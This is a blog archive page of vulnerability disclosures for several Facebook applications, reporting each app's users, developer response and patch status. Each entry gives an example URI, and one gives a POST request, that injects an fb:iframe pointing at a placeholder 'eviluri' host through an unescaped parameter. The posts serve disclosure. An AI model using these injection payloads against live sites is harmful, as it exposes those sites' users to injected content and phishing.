Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Trazzler
Facebook Verified Application
Current Monthly Active Users: 5,448
Current Rank on Application Leaderboard: 2,833
Application Developer: Trazzler
Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.
Vulnerability Status: Unpatched Patched Sep. 24
Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D’http%3A%2F%2FEVILURI%2F’%3E
Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: My Zoo
Current Monthly Active Users: 953,784
Current Rank on Application Leaderboard: 124
Application Developer: Eyrewood Studios
Responsiveness: I did not direct contact information for the developer, so I forwarded this request to Facebook, and the hole has since been patched.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Hugged
Facebook Verified Application
Current Monthly Active Users: 3,169,974
Current Rank on Application Leaderboard: 51
Application Developer: Manakki
Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | 1 comment
FAXX Hack: SocialCalendar
Facebook Verified Application
Current Monthly Active Users: 1,661,572
Current Rank on Application Leaderboard: 93
Application Developer: SocialCalendar.com
Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1
Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query=”/><fb:iframe src=”http://eviluri/”>&sc_op=showView&sc_v=movieSearch
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Circle of Friends
Posting these is not an automated process, and I was on the road most of yesterday, so again I apologize for being a day late. This counts as Friday’s FAXX Hack.
Current Monthly Active Users: 635,797
Current Rank on Application Leaderboard: 172
Application Developer: Bantr
Responsiveness: I received an e-mail about a day after reporting the hole to let me know that Bantr had fixed it.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E
Keep Reading »Content License
All content by theharmonyguy on this site, including text and images, is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.